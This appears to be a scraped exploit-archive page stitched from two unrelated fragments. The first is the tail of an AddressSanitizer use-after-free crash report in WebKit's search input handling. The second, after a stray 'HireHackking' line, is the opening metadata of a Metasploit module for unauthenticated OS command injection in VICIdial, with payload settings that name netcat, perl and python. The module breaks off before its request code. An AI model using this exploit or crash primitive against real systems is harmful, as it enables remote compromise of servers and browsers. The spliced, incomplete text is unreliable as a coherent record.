    #12 0x114c443e5 in WebCore::jsDocumentPrototypeFunctionExecCommandCaller(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13363e5)
    #13 0x114c2add8 in long long WebCore::BindingCaller<WebCore::JSDocument>::callOperation<&(WebCore::jsDocumentPrototypeFunctionExecCommandCaller(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x131cdd8)
    #14 0x114c2ac41 in WebCore::jsDocumentPrototypeFunctionExecCommand(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x131cc41)
    #15 0x5b96c2401027  (<unknown module>)
    #16 0x10d35034a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)
    #17 0x10d35034a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)
    #18 0x10d34991a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157091a)
    #19 0x10cfae757 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11d5757)
    #20 0x10cf303da in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11573da)
    #21 0x10c5680f1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f0f1)
    #22 0x10c568362 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f362)
    #23 0x10c5686d3 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f6d3)
    #24 0x114b01a15 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11f3a15)
    #25 0x114e95510 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1587510)
    #26 0x11429668e in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x98868e)
    #27 0x114296170 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x988170)
    #28 0x114171041 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x863041)
    #29 0x114180aaf in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x872aaf)
    #30 0x1140827af in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7747af)
    #31 0x11407d103 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f103)
    #32 0x1144229ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce)
    #33 0x11441fd0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c)
    #34 0x11409b493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493)
    #35 0x11460f5c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)
    #36 0x11413a093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)
    #37 0x1140f9386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)
    #38 0x113b88997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)
    #39 0x113b822aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)
    #40 0x116509c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)
    #41 0x1066932eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)
    #42 0x106696689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)
    #43 0x106695ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)
    #44 0x105f36683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)
    #45 0x105ce03b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)
    #46 0x105ce9888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)
    #47 0x10d9dc3b3 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c033b3)
    #48 0x10d9dcd41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)
    #49 0x7fffd2f753c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0)
    #50 0x7fffd2f562cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc)
    #51 0x7fffd2f557c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5)
    #52 0x7fffd2f551c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)
    #53 0x7fffd24b6ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)
    #54 0x7fffd24b6cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)
    #55 0x7fffd24b6b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)
    #56 0x7fffd0a51e23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)
    #57 0x7fffd11cd85d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)
    #58 0x7fffd0a467aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)
    #59 0x7fffd0a111dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)
    #60 0x7fffe89118c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)
    #61 0x7fffe89102e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)
    #62 0x105bee56c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)
    #63 0x7fffe86b8234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)

0x6110000e2a88 is located 8 bytes inside of 208-byte region [0x6110000e2a80,0x6110000e2b50)
freed by thread T0 here:
    #0 0x108bd9294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)
    #1 0x10da23f30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)
    #2 0x114660e6d in WebCore::HTMLInputElement::updateType() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd52e6d)
    #3 0x114662265 in WebCore::HTMLInputElement::parseAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd54265)
    #4 0x114226fe8 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x918fe8)
    #5 0x114235231 in WebCore::Element::didModifyAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x927231)
    #6 0x114226a83 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x918a83)
    #7 0x11501b946 in WebCore::setJSHTMLInputElementTypeFunction(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x170d946)
    #8 0x115011fc7 in bool WebCore::BindingCaller<WebCore::JSHTMLInputElement>::setAttribute<&(WebCore::setJSHTMLInputElementTypeFunction(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, long long, long long, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1703fc7)
    #9 0x10c674bf8 in JSC::callCustomSetter(JSC::ExecState*, bool (*)(JSC::ExecState*, long long, long long), bool, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x89bbf8)
    #10 0x10c674d27 in JSC::callCustomSetter(JSC::ExecState*, JSC::JSValue, bool, JSC::JSObject*, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x89bd27)
    #11 0x10d14e2a9 in JSC::JSObject::putInlineSlow(JSC::ExecState*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x13752a9)
    #12 0x10d32ffa1 in llint_slow_path_put_by_id (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1556fa1)
    #13 0x10d34cce3 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1573ce3)
    #14 0x10d3502d8 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15772d8)
    #15 0x10d34991a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157091a)
    #16 0x10cfae757 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11d5757)
    #17 0x10cf303da in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11573da)
    #18 0x10c5680f1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f0f1)
    #19 0x10c568362 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f362)
    #20 0x10c5686d3 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f6d3)
    #21 0x114b01a15 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11f3a15)
    #22 0x114e95510 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1587510)
    #23 0x11429668e in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x98868e)
    #24 0x114296170 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x988170)
    #25 0x11425dd77 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94fd77)
    #26 0x11425edbe in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x950dbe)
    #27 0x11425e733 in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x950733)
    #28 0x1146664bc in WebCore::HTMLInputElement::onSearch() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd584bc)
    #29 0x11627979c in WebCore::SearchInputType::startSearchEventTimer() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x296b79c)

previously allocated by thread T0 here:
    #0 0x108bd8d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)
    #1 0x7fffe883a281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)
    #2 0x10da2dae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)
    #3 0x10da22c4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)
    #4 0x10d9b8437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)
    #5 0x10d9b7768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)
    #6 0x114901b48 in WebCore::InputType::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xff3b48)
    #7 0x114901759 in std::__1::unique_ptr<WebCore::InputType, std::__1::default_delete<WebCore::InputType> > WebCore::createInputType<WebCore::SearchInputType>(WebCore::HTMLInputElement&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xff3759)
    #8 0x1148fc15c in WebCore::InputType::create(WebCore::HTMLInputElement&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xfee15c)
    #9 0x114660be3 in WebCore::HTMLInputElement::updateType() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd52be3)
    #10 0x114662265 in WebCore::HTMLInputElement::parseAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd54265)
    #11 0x114226fe8 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x918fe8)
    #12 0x114235231 in WebCore::Element::didModifyAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x927231)
    #13 0x114226a83 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x918a83)
    #14 0x11501b946 in WebCore::setJSHTMLInputElementTypeFunction(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x170d946)
    #15 0x115011fc7 in bool WebCore::BindingCaller<WebCore::JSHTMLInputElement>::setAttribute<&(WebCore::setJSHTMLInputElementTypeFunction(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, long long, long long, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1703fc7)
    #16 0x10c674bf8 in JSC::callCustomSetter(JSC::ExecState*, bool (*)(JSC::ExecState*, long long, long long), bool, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x89bbf8)
    #17 0x10c674d27 in JSC::callCustomSetter(JSC::ExecState*, JSC::JSValue, bool, JSC::JSObject*, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x89bd27)
    #18 0x10d14e2a9 in JSC::JSObject::putInlineSlow(JSC::ExecState*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x13752a9)
    #19 0x10d32ffa1 in llint_slow_path_put_by_id (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1556fa1)
    #20 0x10d34cce3 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1573ce3)
    #21 0x10d35034a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)
    #22 0x10d34991a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157091a)
    #23 0x10cfae757 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11d5757)
    #24 0x10cf303da in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11573da)
    #25 0x10c5680f1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f0f1)
    #26 0x10c568362 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f362)
    #27 0x10c5686d3 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f6d3)
    #28 0x114b01a15 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11f3a15)
    #29 0x114e95510 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1587510)

SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20a2da) in WebCore::InputType::element() const
Shadow bytes around the buggy address:
  0x1c220001c500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1c220001c510: 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa
  0x1c220001c520: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x1c220001c530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1c220001c540: 00 00 00 fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x1c220001c550: fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x1c220001c560: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa
  0x1c220001c570: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x1c220001c580: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x1c220001c590: fd fd fd fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c220001c5a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc fc
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==29786==ABORTING
-->
HireHackking 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'VICIdial user_authorization Unauthenticated Command Execution',
      'Description'    => %q{
        This module exploits a vulnerability in VICIdial versions
        2.9 RC 1 to 2.13 RC1 which allows unauthenticated users
        to execute arbitrary operating system commands as the web
        server user if password encryption is enabled (disabled
        by default).

        When password encryption is enabled the user's password
        supplied using HTTP basic authentication is used in a call
        to exec().

        This module has been tested successfully on version 2.11 RC2
        and 2.13 RC1 on CentOS.
      },
      'License'        => MSF_LICENSE,
      'Author'         => 'Brendan Coles <bcoles[at]gmail.com>',
      'References'     =>
        [
          ['URL', 'http://www.vicidial.org/VICIDIALmantis/view.php?id=1016']
        ],
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          # HTTP Basic authentication password
          'Space' => 2048,
          # apostrophe ('), quote ("), semi-colon (;) and backslash (\)
          # are removed by preg_replace
          'BadChars' => "\x00\x0A\x22\x27\x3B\x5C",
          'DisableNops' => true,
          'Compat' =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl python netcat'
            }
        },
      'Targets'        => [[ 'Automatic Targeting', {} ]],
      'Privileged'     => false,
      'DisclosureDate' => 'May 26 2017',
      'DefaultTarget'  => 0))
